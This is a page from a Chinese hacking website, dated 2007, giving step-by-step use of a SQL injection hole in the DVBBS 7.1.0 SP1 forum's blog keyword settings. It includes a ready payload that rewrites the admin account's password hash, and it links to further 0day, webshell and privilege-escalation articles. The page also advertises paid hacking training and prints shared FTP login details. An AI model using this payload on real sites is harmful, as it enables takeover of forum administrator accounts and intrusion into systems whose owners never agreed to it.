　

　

安全中国首页 > 文章中心 > 动网Dvbbs文章

　

加入安全中国终身VIP会员待遇：
永久学习已开设的所有培训班课程和以后新开培训班课程
赠送7位无密码保护ＱＱ
赠送终身VIP会员独享光盘工具包一份
为终身VIP会员推荐安排工作就业

安全中国网友投稿专用上传FTP空间：
Ftp服务器：www.anqn.com
Ftp端口：21
用户名：anqn
密码：anqn.com

　

DVBBS 7.1.0 SP1博客远程注入漏洞(图)

安全中国 www.anqn.com

更新时间:2007-10-22 1:58:38

责任编辑:流火

热点：

漏洞文件:BokeManage.asp
受影响版本:DVBBS <= 7.1.0 sp1 SQL版
补丁下载:点击下载
利用方法 (转自守护天使's Blog):
注册会员→ 进入管理博客→关健字设置
随便填

再编辑关健字

上面几个还是随便填写。。
在第三个，也就是连接地址这里写入语句

123123'where 1=0;update dv_user set userpassword='469e80d32c0559f8' where username='admin'--

·上一篇: 不为人知的动网7.1 SQL版注入漏洞(图)
·下一篇: 动网8.0最新XSS漏洞(图)

　

相关文章

·投稿:入侵DVBBS7到flashFXP提权
·Dvbbs8.1 0DAY(通杀Access和mssql版本)(图)
·Dvbbs8.1 0DAY(通杀Access和mssql版本)(图)
·2个Dvbbs SQL(Savepost)漏洞利用工具(图)
·菜鸟利用动网Dvbbs新漏洞批量拿网站(工具)
·动网Dvbbs 7.10爆物理路径工具(图)
·Dvbbs8.0 access 后台拿webshell for 2003
·几个暴动网Dvbbs数据库的代码
·动网Dvbbs 0day漏洞利用程序(图)
·Dvbbs8动网论坛最新0day研究探讨

一日一文章

　

一日一软件

一日一动画

　